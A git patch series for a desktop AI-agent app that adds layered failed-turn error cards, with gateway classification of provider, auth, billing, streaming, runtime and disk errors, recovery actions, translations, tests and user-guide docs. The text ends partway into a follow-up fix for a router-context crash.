@@ const AssistantMessageBody: FC - - {onDismissError && ( - onDismissError(messageId)} - side="top" - tooltip={t.assistant.thread.dismissError} - > - - - )} +
+
+ + +
+ {onDismissError && ( + onDismissError(messageId)} + side="top" + tooltip={t.assistant.thread.dismissError} + > + + + )} +
+
@@ -433,6 +443,103 @@ const StreamingMarker: FC = () => { ) } +// ── Layered error card pieces ──────────────────────────────────────────── +// +// The gateway stamps failed turns with a structured {layer, code, retryable} +// descriptor (metadata.custom.errorSurface — see agent/error_surface.py). +// These leaves render the layer label + recovery actions. Older backends +// never send the descriptor: the label falls back to a generic title and the +// action row still offers Retry / Open Logs / Copy diagnostics, so nothing +// regresses on version skew. + +const ErrorLayerLabel: FC = () => { + const { t } = useI18n() + const surface = useAuiState(s => s.message.metadata?.custom?.errorSurface as ErrorSurface | undefined) + + const labels = t.assistant.thread.errorLayers + const label = (surface && labels[surface.layer]) || labels.generic + + return
{label}
+} + +const ErrorRecoveryActions: FC = () => { + const { t } = useI18n() + const copy = t.assistant.thread + const surface = useAuiState(s => s.message.metadata?.custom?.errorSurface as ErrorSurface | undefined) + + const errorText = useAuiState(s => { + const status = s.message.status as { error?: unknown; type?: string } | undefined + + return status?.type === 'incomplete' && typeof status.error === 'string' ? status.error : '' + }) + + const navigate = useNavigate() + const model = useStore($currentModel) + + // Retry = assistant-ui reload (same wiring as the footer's refresh action): + // re-runs the failed turn's prompt in place. Suppressed when the classifier + // says the failure is deterministic (retrying reproduces it). + const retryable = !surface || surface.retryable + + // Switch Provider deep-links Settings → Models for the layers where the fix + // is provider/endpoint/auth config, not a retry. + const showSwitchProvider = surface != null && ['auth', 'billing', 'endpoint', 'provider'].includes(surface.layer) + + const openLogs = useCallback(async () => { + try { + const root = await window.hermesDesktop?.logsRoot?.() + + if (!root) { + notifyError(new Error('logs root unavailable'), copy.errorOpenLogsFailed) + + return + } + + const result = await window.hermesDesktop?.openDir?.(root) + + if (result && !result.ok) { + notifyError(new Error(result.error || 'open failed'), copy.errorOpenLogsFailed) + } + } catch (error) { + notifyError(error, copy.errorOpenLogsFailed) + } + }, [copy.errorOpenLogsFailed]) + + const diagnosticsText = useCallback( + () => + formatErrorDiagnostics({ + errorText, + model: model || undefined, + surface + }), + [errorText, model, surface] + ) + + return ( +
+ {retryable && ( + + + + )} + {showSwitchProvider && ( + + )} + {window.hermesDesktop?.logsRoot && ( + + )} + +
+ ) +} + const AssistantActionBar: FC = ({ messageId, getMessageText, onBranchInNewChat }) => { const { t } = useI18n() const copy = t.assistant.thread diff --git a/apps/desktop/src/global.d.ts b/apps/desktop/src/global.d.ts index 98db0b39b3..f0038c367e 100644 --- a/apps/desktop/src/global.d.ts +++ b/apps/desktop/src/global.d.ts @@ -297,6 +297,8 @@ declare global { // resolved by Electron independently of the connected backend (#66899). // Created on demand; returns the normalized absolute path. desktopPluginsRoot?: () => Promise + /** LOCAL `/logs` (profile-aware) — error card "Open Logs". */ + logsRoot?: () => Promise // Local AGENT-plugin root (/plugins), same Electron-local // resolution. The disk door also scans it for `/desktop/plugin.js` // so one agent-plugin package can ship a desktop UI half. Optional: diff --git a/apps/desktop/src/i18n/ar.ts b/apps/desktop/src/i18n/ar.ts index d59c83f71f..86eaa3b229 100644 --- a/apps/desktop/src/i18n/ar.ts +++ b/apps/desktop/src/i18n/ar.ts @@ -2434,6 +2434,22 @@ export const ar = defineLocale({ branchNewChat: 'تفريع إلى محادثة جديدة', react: 'تفاعل', dismissError: 'تجاهل الخطأ', + errorLayers: { + auth: 'خطأ في المصادقة', + billing: 'نفاد الرصيد', + disk: 'القرص ممتلئ', + endpoint: 'خطأ في نقطة النهاية المخصصة', + gateway: 'خطأ في البوابة', + generic: 'فشلت الجولة', + provider: 'خطأ من المزوّد', + runtime: 'خطأ في بيئة التشغيل المحلية', + streaming: 'خطأ في اتصال البث' + }, + errorRetry: 'إعادة المحاولة', + errorSwitchProvider: 'تبديل المزوّد', + errorOpenLogs: 'فتح السجلات', + errorOpenLogsFailed: 'تعذّر فتح مجلد السجلات', + errorCopyDiagnostics: 'نسخ التشخيصات', filesChanged: count => `${count} ملفات تم تغييرها`, reviewChanges: 'مراجعة', readAloudFailed: 'فشلت القراءة بصوت عال', diff --git a/apps/desktop/src/i18n/en.ts b/apps/desktop/src/i18n/en.ts index d8926ce09d..5870321a6a 100644 --- a/apps/desktop/src/i18n/en.ts +++ b/apps/desktop/src/i18n/en.ts @@ -3079,6 +3079,22 @@ export const en: Translations = { branchNewChat: 'Branch in new chat', react: 'React', dismissError: 'Dismiss error', + errorLayers: { + auth: 'Authentication error', + billing: 'Out of credits', + disk: 'Disk full', + endpoint: 'Custom endpoint error', + gateway: 'Gateway error', + generic: 'Turn failed', + provider: 'Provider error', + runtime: 'Local runtime error', + streaming: 'Streaming connection error' + }, + errorRetry: 'Retry', + errorSwitchProvider: 'Switch provider', + errorOpenLogs: 'Open logs', + errorOpenLogsFailed: 'Could not open the logs folder', + errorCopyDiagnostics: 'Copy diagnostics', filesChanged: count => (count === 1 ? '1 file changed' : `${count} files changed`), reviewChanges: 'Review', readAloudFailed: 'Read aloud failed', diff --git a/apps/desktop/src/i18n/ja.ts b/apps/desktop/src/i18n/ja.ts index 5868fca013..e1a492ecb8 100644 --- a/apps/desktop/src/i18n/ja.ts +++ b/apps/desktop/src/i18n/ja.ts @@ -2731,6 +2731,22 @@ export const ja = defineLocale({ branchNewChat: '新しいチャットでブランチ', react: 'リアクション', dismissError: 'エラーを閉じる', + errorLayers: { + auth: '認証エラー', + billing: 'クレジット不足', + disk: 'ディスク容量不足', + endpoint: 'カスタムエンドポイントのエラー', + gateway: 'ゲートウェイのエラー', + generic: 'ターンが失敗しました', + provider: 'プロバイダーのエラー', + runtime: 'ローカルランタイムのエラー', + streaming: 'ストリーミング接続のエラー' + }, + errorRetry: '再試行', + errorSwitchProvider: 'プロバイダーを切り替え', + errorOpenLogs: 'ログを開く', + errorOpenLogsFailed: 'ログフォルダを開けませんでした', + errorCopyDiagnostics: '診断情報をコピー', filesChanged: count => `${count} 件のファイルを変更`, reviewChanges: 'レビュー', readAloudFailed: '読み上げに失敗しました', diff --git a/apps/desktop/src/i18n/types.ts b/apps/desktop/src/i18n/types.ts index 61ef0bbc04..dc8151982e 100644 --- a/apps/desktop/src/i18n/types.ts +++ b/apps/desktop/src/i18n/types.ts @@ -2648,6 +2648,24 @@ export interface Translations { branchNewChat: string react: string dismissError: string + /** Layer titles for the structured error card (agent/error_surface.py). + * `generic` is the fallback when the backend sent no descriptor. */ + errorLayers: { + auth: string + billing: string + disk: string + endpoint: string + gateway: string + generic: string + provider: string + runtime: string + streaming: string + } + errorRetry: string + errorSwitchProvider: string + errorOpenLogs: string + errorOpenLogsFailed: string + errorCopyDiagnostics: string filesChanged: (count: number) => string reviewChanges: string readAloudFailed: string diff --git a/apps/desktop/src/i18n/zh-hant.ts b/apps/desktop/src/i18n/zh-hant.ts index b2317b4ea1..378a90662a 100644 --- a/apps/desktop/src/i18n/zh-hant.ts +++ b/apps/desktop/src/i18n/zh-hant.ts @@ -2641,6 +2641,22 @@ export const zhHant = defineLocale({ branchNewChat: '在新聊天中分支', react: '回應', dismissError: '关闭错误', + errorLayers: { + auth: '認證錯誤', + billing: '額度不足', + disk: '磁碟已滿', + endpoint: '自訂端點錯誤', + gateway: '閘道錯誤', + generic: '本輪失敗', + provider: '模型服務商錯誤', + runtime: '本機執行環境錯誤', + streaming: '串流連線錯誤' + }, + errorRetry: '重試', + errorSwitchProvider: '切換服務商', + errorOpenLogs: '開啟日誌', + errorOpenLogsFailed: '無法開啟日誌資料夾', + errorCopyDiagnostics: '複製診斷資訊', filesChanged: count => `${count} 個檔案已變更`, reviewChanges: '檢視', readAloudFailed: '朗讀失敗', diff --git a/apps/desktop/src/i18n/zh.ts b/apps/desktop/src/i18n/zh.ts index 66585070a4..5cdbc9db25 100644 --- a/apps/desktop/src/i18n/zh.ts +++ b/apps/desktop/src/i18n/zh.ts @@ -3243,6 +3243,22 @@ export const zh: Translations = { branchNewChat: '在新对话中分支', react: '回应', dismissError: '关闭错误', + errorLayers: { + auth: '认证错误', + billing: '额度不足', + disk: '磁盘已满', + endpoint: '自定义端点错误', + gateway: '网关错误', + generic: '本轮失败', + provider: '模型服务商错误', + runtime: '本地运行时错误', + streaming: '流式连接错误' + }, + errorRetry: '重试', + errorSwitchProvider: '切换服务商', + errorOpenLogs: '打开日志', + errorOpenLogsFailed: '无法打开日志文件夹', + errorCopyDiagnostics: '复制诊断信息', filesChanged: count => `${count} 个文件已更改`, reviewChanges: '查看', readAloudFailed: '朗读失败', diff --git a/apps/desktop/src/lib/chat-messages/types.ts b/apps/desktop/src/lib/chat-messages/types.ts index 0706a73085..8620b85853 100644 --- a/apps/desktop/src/lib/chat-messages/types.ts +++ b/apps/desktop/src/lib/chat-messages/types.ts @@ -1,6 +1,7 @@ import type { ThreadMessageLike } from '@assistant-ui/react' import { type BillingBlock } from '@hermes/shared' +import type { ErrorSurface } from '@/lib/error-surface' import type { MessageReaction, SessionMessage, UsageStats } from '@/types/hermes' export interface TimelinePartMetadata { @@ -21,6 +22,10 @@ export type ChatMessage = { completedAt?: number pending?: boolean error?: string + /** Structured layer descriptor for a failed turn (parsed error_surface). + * Drives the error card's layer label + actions; absent on older + * backends, where the card falls back to generic copy. */ + errorSurface?: ErrorSurface branchGroupId?: string hidden?: boolean /** Sealed mid-turn commentary (`message.interim`) — rendered without the @@ -59,6 +64,10 @@ export type GatewayEventPayload = { result?: unknown summary?: string error?: string | boolean + // message.complete with status "error" — structured {layer, code, retryable} + // descriptor naming which stack layer failed (agent/error_surface.py). + // Absent on older gateways; consumers must fall back to string heuristics. + error_surface?: unknown inline_diff?: string duration_s?: number todos?: unknown diff --git a/apps/desktop/src/lib/chat-runtime.ts b/apps/desktop/src/lib/chat-runtime.ts index 8bf133b674..211912dad6 100644 --- a/apps/desktop/src/lib/chat-runtime.ts +++ b/apps/desktop/src/lib/chat-runtime.ts @@ -484,6 +484,8 @@ export function toRuntimeMessage(message: ChatMessage): ThreadMessage { ...timelineMeta, ...(message.completedAt !== undefined ? { timelineCompletedAt: message.completedAt } : {}), ...(message.durationS !== undefined ? { durationS: message.durationS } : {}), + // Structured failure layer for the error card (see lib/error-surface). + ...(message.errorSurface ? { errorSurface: message.errorSurface } : {}), ...reactionMeta } } diff --git a/apps/desktop/src/lib/error-surface.test.ts b/apps/desktop/src/lib/error-surface.test.ts new file mode 100644 index 0000000000..ea7f9bd87d --- /dev/null +++ b/apps/desktop/src/lib/error-surface.test.ts @@ -0,0 +1,58 @@ +import { describe, expect, it } from 'vitest' + +import { formatErrorDiagnostics, parseErrorSurface } from './error-surface' + +describe('parseErrorSurface', () => { + it('accepts a valid descriptor', () => { + expect(parseErrorSurface({ layer: 'streaming', code: 'stream_drop', retryable: true })).toEqual({ + layer: 'streaming', + code: 'stream_drop', + retryable: true + }) + }) + + it('accepts every documented layer', () => { + for (const layer of ['provider', 'endpoint', 'streaming', 'auth', 'billing', 'gateway', 'runtime', 'disk']) { + expect(parseErrorSurface({ layer, code: 'x', retryable: false })?.layer).toBe(layer) + } + }) + + it('rejects unknown layers and non-objects', () => { + expect(parseErrorSurface({ layer: 'blockchain', code: 'x', retryable: true })).toBeNull() + expect(parseErrorSurface('provider')).toBeNull() + expect(parseErrorSurface(null)).toBeNull() + expect(parseErrorSurface(undefined)).toBeNull() + expect(parseErrorSurface(7)).toBeNull() + }) + + it('defaults code and retryable when missing', () => { + expect(parseErrorSurface({ layer: 'gateway' })).toEqual({ layer: 'gateway', code: 'unknown', retryable: true }) + }) + + it('honors retryable=false', () => { + expect(parseErrorSurface({ layer: 'auth', code: 'auth_permanent', retryable: false })?.retryable).toBe(false) + }) +}) + +describe('formatErrorDiagnostics', () => { + it('includes layer, code, model and error', () => { + const text = formatErrorDiagnostics({ + errorText: 'boom', + model: 'anthropic/claude-opus-4.6', + surface: { layer: 'provider', code: 'rate_limit', retryable: true } + }) + + expect(text).toContain('layer: provider') + expect(text).toContain('code: rate_limit') + expect(text).toContain('model: anthropic/claude-opus-4.6') + expect(text).toContain('error: boom') + }) + + it('omits absent fields without leaving blank lines', () => { + const text = formatErrorDiagnostics({ errorText: 'boom' }) + + expect(text).not.toContain('layer:') + expect(text).not.toContain('model:') + expect(text.split('\n').every(line => line.trim().length > 0)).toBe(true) + }) +}) diff --git a/apps/desktop/src/lib/error-surface.ts b/apps/desktop/src/lib/error-surface.ts new file mode 100644 index 0000000000..2297afa023 --- /dev/null +++ b/apps/desktop/src/lib/error-surface.ts @@ -0,0 +1,71 @@ +// Structured turn-error descriptor forwarded by the gateway (see +// agent/error_surface.py). Names WHICH layer of the stack failed so the error +// card can say "Provider error" / "Gateway error" and offer layer-appropriate +// recovery actions, instead of toasting an opaque string. +// +// Advisory contract: older backends never send this — every consumer must +// keep working when it is absent (legacy string-sniffing stays as fallback). + +export const ERROR_SURFACE_LAYERS = [ + 'provider', + 'endpoint', + 'streaming', + 'auth', + 'billing', + 'gateway', + 'runtime', + 'disk' +] as const + +export type ErrorSurfaceLayer = (typeof ERROR_SURFACE_LAYERS)[number] + +export interface ErrorSurface { + layer: ErrorSurfaceLayer + /** Specific failure code (a FailoverReason value or site-specific code). */ + code: string + /** False when retrying unchanged reproduces the same failure. */ + retryable: boolean +} + +/** Validate a wire payload into an ErrorSurface, or null when absent/garbled. */ +export function parseErrorSurface(value: unknown): ErrorSurface | null { + if (!value || typeof value !== 'object') { + return null + } + + const raw = value as { code?: unknown; layer?: unknown; retryable?: unknown } + const layer = typeof raw.layer === 'string' ? (raw.layer as ErrorSurfaceLayer) : null + + if (!layer || !ERROR_SURFACE_LAYERS.includes(layer)) { + return null + } + + return { + layer, + code: typeof raw.code === 'string' && raw.code ? raw.code : 'unknown', + retryable: raw.retryable !== false + } +} + +/** Plain-text diagnostics blob for the error card's "Copy diagnostics". */ +export function formatErrorDiagnostics(input: { + appVersion?: string + errorText: string + model?: string + provider?: string + surface?: ErrorSurface | null +}): string { + const lines = [ + '── Hermes error diagnostics ──', + `time: ${new Date().toISOString()}`, + input.surface ? `layer: ${input.surface.layer}` : null, + input.surface ? `code: ${input.surface.code}` : null, + input.surface ? `retryable: ${input.surface.retryable}` : null, + input.provider ? `provider: ${input.provider}` : null, + input.model ? `model: ${input.model}` : null, + input.appVersion ? `app: ${input.appVersion}` : null, + `error: ${input.errorText}` + ] + + return lines.filter((line): line is string => Boolean(line)).join('\n') +} diff --git a/apps/desktop/src/styles.css b/apps/desktop/src/styles.css index 396ed175d9..8bf309d4ea 100644 --- a/apps/desktop/src/styles.css +++ b/apps/desktop/src/styles.css @@ -2107,6 +2107,28 @@ button[data-slot='aui_msg-reactions']:not([data-reacted])[data-state='open'] { pointer-events: auto; } +/* Failed-turn error card actions (Retry · Switch provider · Open logs · + Copy diagnostics) — compact pill buttons tinted to the card's destructive + palette. Stylesheet-owned so the CopyButton inline appearance picks the + same look via the shared class. */ +.aui-error-action { + display: inline-flex; + align-items: center; + gap: 0.3rem; + border: 1px solid color-mix(in srgb, var(--dt-destructive) 30%, transparent); + border-radius: 9999px; + background: transparent; + padding: 0.1rem 0.55rem; + font-size: 0.72rem; + line-height: 1.1rem; + color: color-mix(in srgb, var(--dt-destructive) 80%, var(--ui-text-secondary)); + cursor: pointer; +} + +.aui-error-action:hover { + background: color-mix(in srgb, var(--dt-destructive) 10%, transparent); +} + .group:hover button[data-slot='aui_msg-reactions']:not([data-reacted]):hover, button[data-slot='aui_msg-reactions']:not([data-reacted])[data-state='open'] { opacity: 1; diff --git a/apps/desktop/src/types/hermes.ts b/apps/desktop/src/types/hermes.ts index 783ee945e5..2c80596c6a 100644 --- a/apps/desktop/src/types/hermes.ts +++ b/apps/desktop/src/types/hermes.ts @@ -638,6 +638,9 @@ export interface SessionResumeResponse { /** Retained failed turn: the error the terminal frame carried (the frame * itself may have been lost to a disconnect). */ error?: string + /** Structured {layer, code, retryable} descriptor for the retained failed + * turn (see agent/error_surface.py). Omitted by older gateways. */ + error_surface?: unknown recoverable?: boolean status?: string streaming?: boolean diff --git a/tests/agent/test_error_surface.py b/tests/agent/test_error_surface.py new file mode 100644 index 0000000000..e17dcfd474 --- /dev/null +++ b/tests/agent/test_error_surface.py @@ -0,0 +1,167 @@ +"""Tests for agent/error_surface.py — turn-error → UI layer descriptors.""" + +from __future__ import annotations + +import pytest + +from agent.error_surface import ( + LAYER_AUTH, + LAYER_BILLING, + LAYER_DISK, + LAYER_ENDPOINT, + LAYER_GATEWAY, + LAYER_PROVIDER, + LAYER_STREAMING, + build_error_surface_from_exception, + build_error_surface_from_result, +) + + +# ── build_error_surface_from_result ────────────────────────────────────── + + +def _failed_result(reason: str = "", error: str = "provider exploded", **extra) -> dict: + result = {"completed": False, "failed": True, "error": error} + if reason: + result["failure_reason"] = reason + result.update(extra) + return result + + +def test_result_none_for_non_dict(): + assert build_error_surface_from_result("boom") is None + assert build_error_surface_from_result(None) is None + + +def test_result_none_for_healthy_result(): + assert ( + build_error_surface_from_result({"completed": True, "final_response": "hi"}) + is None + ) + + +def test_result_auth_reasons_map_to_auth_layer(): + surface = build_error_surface_from_result(_failed_result("auth")) + assert surface == {"layer": LAYER_AUTH, "code": "auth", "retryable": True} + + surface = build_error_surface_from_result(_failed_result("auth_permanent")) + assert surface["layer"] == LAYER_AUTH + assert surface["retryable"] is False + + +def test_result_billing_block_wins(): + surface = build_error_surface_from_result( + _failed_result("rate_limit", billing_block={"provider": "nous"}) + ) + assert surface["layer"] == LAYER_BILLING + assert surface["retryable"] is False + + +def test_result_billing_reason_without_block(): + surface = build_error_surface_from_result(_failed_result("billing")) + assert surface == {"layer": LAYER_BILLING, "code": "billing", "retryable": False} + + +def test_result_provider_default_for_classified_reasons(): + for reason in ( + "rate_limit", + "server_error", + "overloaded", + "unknown", + "format_error", + ): + surface = build_error_surface_from_result(_failed_result(reason)) + assert surface["layer"] == LAYER_PROVIDER, reason + assert surface["code"] == reason + + +def test_result_non_retryable_reasons(): + for reason in ( + "content_policy_blocked", + "model_not_found", + "ssl_cert_verification", + ): + surface = build_error_surface_from_result(_failed_result(reason)) + assert surface["retryable"] is False, reason + + +def test_result_timeout_on_custom_endpoint_is_endpoint_layer(): + surface = build_error_surface_from_result( + _failed_result("timeout"), provider="custom" + ) + assert surface["layer"] == LAYER_ENDPOINT + + # Same reason on a vendor provider stays provider-layer. + surface = build_error_surface_from_result( + _failed_result("timeout"), provider="anthropic" + ) + assert surface["layer"] == LAYER_PROVIDER + + +def test_result_stream_drop_text_maps_to_streaming(): + surface = build_error_surface_from_result( + _failed_result(error="The provider's stream connection keeps dropping") + ) + assert surface["layer"] == LAYER_STREAMING + assert surface["code"] == "stream_drop" + assert surface["retryable"] is True + + +def test_result_unclassified_failure_defaults_to_provider_unknown(): + surface = build_error_surface_from_result(_failed_result(error="something odd")) + assert surface == {"layer": LAYER_PROVIDER, "code": "unknown", "retryable": True} + + +def test_result_disk_full_wins_over_reason(): + surface = build_error_surface_from_result( + _failed_result( + "server_error", error="OSError: [Errno 28] No space left on device" + ) + ) + assert surface["layer"] == LAYER_DISK + assert surface["retryable"] is False + + +# ── build_error_surface_from_exception ─────────────────────────────────── + + +def test_exception_non_api_is_gateway_layer(): + surface = build_error_surface_from_exception(KeyError("history")) + assert surface["layer"] == LAYER_GATEWAY + assert surface["code"] == "KeyError" + assert surface["retryable"] is True + + +def test_exception_disk_full_is_disk_layer(): + surface = build_error_surface_from_exception(OSError(28, "No space left on device")) + assert surface["layer"] == LAYER_DISK + + +def test_exception_with_status_code_routes_through_classifier(): + class FakeAPIError(Exception): + status_code = 429 + + surface = build_error_surface_from_exception( + FakeAPIError("rate limited"), provider="openrouter" + ) + # 429 → rate_limit → provider layer via the real classifier. + assert surface["layer"] == LAYER_PROVIDER + assert surface["code"] in ("rate_limit", "upstream_rate_limit") + + +def test_exception_auth_status_routes_to_auth_layer(): + class FakeAuthError(Exception): + status_code = 401 + + surface = build_error_surface_from_exception(FakeAuthError("invalid api key")) + assert surface["layer"] == LAYER_AUTH + + +def test_exception_never_raises_on_weird_input(): + class Hostile(Exception): + @property + def status_code(self): # pragma: no cover - exercised via classifier + raise RuntimeError("hostile attribute") + + # Must not raise, whatever it returns. + build_error_surface_from_exception(Hostile("x")) diff --git a/tests/tui_gateway/test_failed_turn_retention.py b/tests/tui_gateway/test_failed_turn_retention.py index 064a1fdf73..455fcc22d5 100644 --- a/tests/tui_gateway/test_failed_turn_retention.py +++ b/tests/tui_gateway/test_failed_turn_retention.py @@ -171,6 +171,62 @@ def test_returned_error_result_retains_snapshot_and_emits_terminal_frame( assert session["running"] is False +def test_returned_error_result_carries_error_surface(emits, turn_env): + """A classified failure_reason rides the terminal frame AND the retained + snapshot as a structured {layer, code, retryable} descriptor, so the + desktop names the failing layer instead of sniffing the message.""" + agent = types.SimpleNamespace( + session_id="session-key", + provider="openrouter", + model="test/model", + run_conversation=lambda *a, **k: { + "final_response": "", + "error": "Rate limit exceeded", + "failed": True, + "failure_reason": "rate_limit", + }, + clear_interrupt=lambda: None, + ) + session = _session(agent=agent, running=True) + server._start_inflight_turn(session, "do the thing") + + server._run_prompt_submit("rid", "sid", session, "do the thing") + + payload = _events(emits, "message.complete")[0] + assert payload["error_surface"] == { + "layer": "provider", + "code": "rate_limit", + "retryable": True, + } + + snapshot = server._inflight_snapshot(session) + assert snapshot is not None + assert snapshot["error_surface"]["layer"] == "provider" + + +def test_returned_error_without_reason_omits_no_frame(emits, turn_env): + """Legacy result dicts (no failure_reason) still get a best-effort + descriptor — never a crash, never a missing terminal frame.""" + agent = types.SimpleNamespace( + session_id="session-key", + run_conversation=lambda *a, **k: { + "final_response": "", + "error": "something odd", + "failed": True, + }, + clear_interrupt=lambda: None, + ) + session = _session(agent=agent, running=True) + server._start_inflight_turn(session, "go") + + server._run_prompt_submit("rid", "sid", session, "go") + + payload = _events(emits, "message.complete")[0] + assert payload["status"] == "error" + assert payload["error_surface"]["layer"] == "provider" + assert payload["error_surface"]["code"] == "unknown" + + def test_completed_turn_still_clears_inflight(emits, turn_env): agent = types.SimpleNamespace( session_id="session-key", @@ -225,6 +281,10 @@ def test_exception_closes_turn_with_terminal_complete_and_partial(emits, turn_en assert snapshot["error"] == "connection reset mid-stream" assert session["running"] is False + # Dispatcher-side exceptions (not API errors) classify as gateway-layer. + assert payload["error_surface"]["layer"] == "gateway" + assert snapshot["error_surface"]["layer"] == "gateway" + # ── Resume replay (the reason retention exists) ─────────────────────── diff --git a/tui_gateway/methods_prompt.py b/tui_gateway/methods_prompt.py index fa0dcd949f..a9773bfe46 100644 --- a/tui_gateway/methods_prompt.py +++ b/tui_gateway/methods_prompt.py @@ -786,6 +786,9 @@ def _(rid, params: dict) -> dict: sid, session, (err.get("error") or {}).get("message", "agent initialization failed"), + # Agent construction never reached the provider: this is a + # local-runtime failure (env/config/venv), not an API error. + error_surface={"layer": "runtime", "code": "agent_init_failed", "retryable": True}, ) with session["history_lock"]: session["running"] = False diff --git a/tui_gateway/server.py b/tui_gateway/server.py index ff08824ea3..48d8039c53 100644 --- a/tui_gateway/server.py +++ b/tui_gateway/server.py @@ -7902,7 +7902,9 @@ def _clear_inflight_turn(session: dict) -> None: session["inflight_turn"] = None -def _fail_inflight_turn(session: dict, error: Any) -> None: +def _fail_inflight_turn( + session: dict, error: Any, error_surface: Optional[dict] = None +) -> None: """Mark the in-flight turn terminal-error but keep it replayable. Normal completion clears ``inflight_turn`` because the response is now in @@ -7926,6 +7928,13 @@ def _fail_inflight_turn(session: dict, error: Any) -> None: turn["error"] = message or "turn failed" turn["status"] = "error" turn["recoverable"] = True + if error_surface: + # Structured {layer, code, retryable} descriptor — replayed to + # resuming clients via the resume snapshot so a reconnect renders the + # same layered error card the live frame carried. + turn["error_surface"] = dict(error_surface) + else: + turn.pop("error_surface", None) turn["streaming"] = False turn["updated_at"] = now session["inflight_turn"] = turn @@ -8485,10 +8494,15 @@ def _inflight_snapshot(session: dict) -> dict | None: snapshot["error"] = error snapshot["status"] = str(turn.get("status") or "error") snapshot["recoverable"] = bool(turn.get("recoverable")) + surface = turn.get("error_surface") + if isinstance(surface, dict) and surface: + snapshot["error_surface"] = surface return snapshot -def _emit_terminal_turn_error(sid: str, session: dict, error: Any) -> None: +def _emit_terminal_turn_error( + sid: str, session: dict, error: Any, error_surface: Optional[dict] = None +) -> None: """Close a failed turn with a terminal ``message.complete`` frame. Emits the same ``status: "error"`` frame shape the returned-error path in @@ -8496,15 +8510,33 @@ def _emit_terminal_turn_error(sid: str, session: dict, error: Any) -> None: uniform), and retains the failed turn via ``_fail_inflight_turn`` so a client that missed this frame (disconnect window) can recover it from ``session.resume``'s ``inflight`` payload. + + ``error_surface`` lets callers that already know the failing layer (e.g. + agent-init failures = local runtime) pass it explicitly; exception + callers leave it None and the classifier derives it here. """ + agent = session.get("agent") + # Classify the failure into a {layer, code, retryable} descriptor so the + # desktop can say "Provider error" / "Gateway error" with matching + # recovery actions instead of a generic toast. Never raises (advisory). + if error_surface is None and isinstance(error, BaseException): + try: + from agent.error_surface import build_error_surface_from_exception + + error_surface = build_error_surface_from_exception( + error, + provider=str(getattr(agent, "provider", "") or ""), + model=str(getattr(agent, "model", "") or ""), + ) + except Exception: + error_surface = None with session["history_lock"]: - _fail_inflight_turn(session, error) + _fail_inflight_turn(session, error, error_surface=error_surface) turn = session.get("inflight_turn") or {} message = str(turn.get("error") or "turn failed") partial = str(turn.get("assistant") or "") cols = int(session.get("cols", 80)) text = partial or f"Error: {message}" - agent = session.get("agent") payload = { "text": text, "usage": _get_usage(agent) if agent is not None else {}, @@ -8512,6 +8544,8 @@ def _emit_terminal_turn_error(sid: str, session: dict, error: Any) -> None: "error": message, "recoverable": True, } + if error_surface: + payload["error_surface"] = error_surface if partial: payload["partial"] = True try: @@ -11233,6 +11267,25 @@ def _run_prompt_submit( rendered = render_message(raw, cols) if rendered: payload["rendered"] = rendered + # Structured layer descriptor ({layer, code, retryable}) so + # clients can name WHICH part of the stack failed (provider / + # streaming / auth / gateway / …) and offer layer-appropriate + # recovery actions instead of sniffing the message string. + # Advisory: older clients ignore it, absence falls back to + # string heuristics on newer clients. Computed before the retain + # below so resume replay carries the same descriptor. + _error_surface = None + if status == "error": + try: + from agent.error_surface import build_error_surface_from_result + + _error_surface = build_error_surface_from_result( + result, + provider=str(getattr(agent, "provider", "") or ""), + model=str(getattr(agent, "model", "") or ""), + ) + except Exception: + _error_surface = None with session["history_lock"]: if status == "error": # Returned-error result (provider 4xx, budget, etc.): retain @@ -11242,6 +11295,7 @@ def _run_prompt_submit( _fail_inflight_turn( session, result.get("error") if isinstance(result, dict) else raw, + error_surface=_error_surface, ) turn_error_retained = True else: @@ -11251,6 +11305,8 @@ def _run_prompt_submit( (result.get("error") if isinstance(result, dict) else "") or raw ) payload["recoverable"] = True + if _error_surface: + payload["error_surface"] = _error_surface _retire_turn_marker(session, marker_key) _emit("message.complete", sid, payload) diff --git a/website/docs/user-guide/desktop.md b/website/docs/user-guide/desktop.md index bb3d561474..ea4ca3b93e 100644 --- a/website/docs/user-guide/desktop.md +++ b/website/docs/user-guide/desktop.md @@ -409,6 +409,26 @@ another profile's agent plugins without switching the whole app (the backend ## Troubleshooting +### Failed turns name the failing layer + +When a turn fails, the chat renders an error card that names **which layer +failed** — provider/model, custom endpoint, streaming connection, +authentication, billing, gateway, local runtime, or disk — instead of a +generic error toast. The card offers recovery actions matched to the failure: + +- **Retry** — re-runs the failed turn in place (hidden when retrying would + deterministically reproduce the failure, e.g. a content-policy rejection). +- **Switch provider** — jumps to Settings → Models for provider, endpoint, + auth, and billing failures. +- **Open logs** — opens `HERMES_HOME/logs` in your file manager. +- **Copy diagnostics** — copies a compact plain-text summary (layer, code, + provider/model, error message) you can paste into a bug report or Discord. + +The layer comes from the same error classifier the agent's retry loop uses, +so it reflects the real failure semantics, not a guess from the message text. +Older backends that predate the descriptor still render the card with a +generic title and the Retry / Open logs / Copy diagnostics actions. + Boot logs land in `HERMES_HOME/logs/desktop.log` (it includes backend output and recent Python tracebacks) — check it first if the app reports a boot failure. You can also tail it from the CLI: ```bash From 892790f9808c8a95443611434c717eb315f0ece9 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 05:02:20 -0700 Subject: [PATCH 073/161] fix(desktop): error card renders router-free threads without crashing useNavigate() throws outside a ; streaming.test.tsx renders the thread bare. Move the Settings deep-link into a SwitchProviderAction child gated on useInRouterContext(), which is safe in any tree. --- .../assistant-ui/thread/assistant-message.tsx | 25 +++++++++++++------ 1 file changed, 18 insertions(+), 7 deletions(-) diff --git a/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx b/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx index 1358327876..a8b9729e78 100644 --- a/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx +++ b/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx @@ -8,7 +8,7 @@ import { } from '@assistant-ui/react' import { useStore } from '@nanostores/react' import { type FC, type ReactNode, useCallback, useMemo, useState } from 'react' -import { useNavigate } from 'react-router' +import { useInRouterContext, useNavigate } from 'react-router' import { useSessionView } from '@/app/chat/session-view' import { SETTINGS_ROUTE } from '@/app/routes' @@ -462,6 +462,19 @@ const ErrorLayerLabel: FC = () => { return
{label}
